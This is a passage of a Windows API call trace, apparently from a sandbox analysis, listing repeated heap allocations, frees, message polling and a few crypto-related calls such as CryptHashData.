lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04348 [0240.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0240.905] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.906] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0240.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xe) returned 0x2e51478 [0240.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e51478, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0240.906] CryptHashData (hHash=0xa87050, pbData=0x2e54f48, dwDataLen=0x3, dwFlags=0x1) returned 1 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699c8 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0240.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977b18 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0240.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0240.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0240.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0240.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0240.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0240.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0240.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0240.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0240.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0240.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0240.910] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3f0 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0240.911] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f558 | out: hHeap=0x970000) returned 1 [0240.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0240.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51508 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0240.912] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3f0 | out: hHeap=0x970000) returned 1 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0240.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0240.913] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0240.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0240.914] HeapFree (in: hHeap=0x970000, 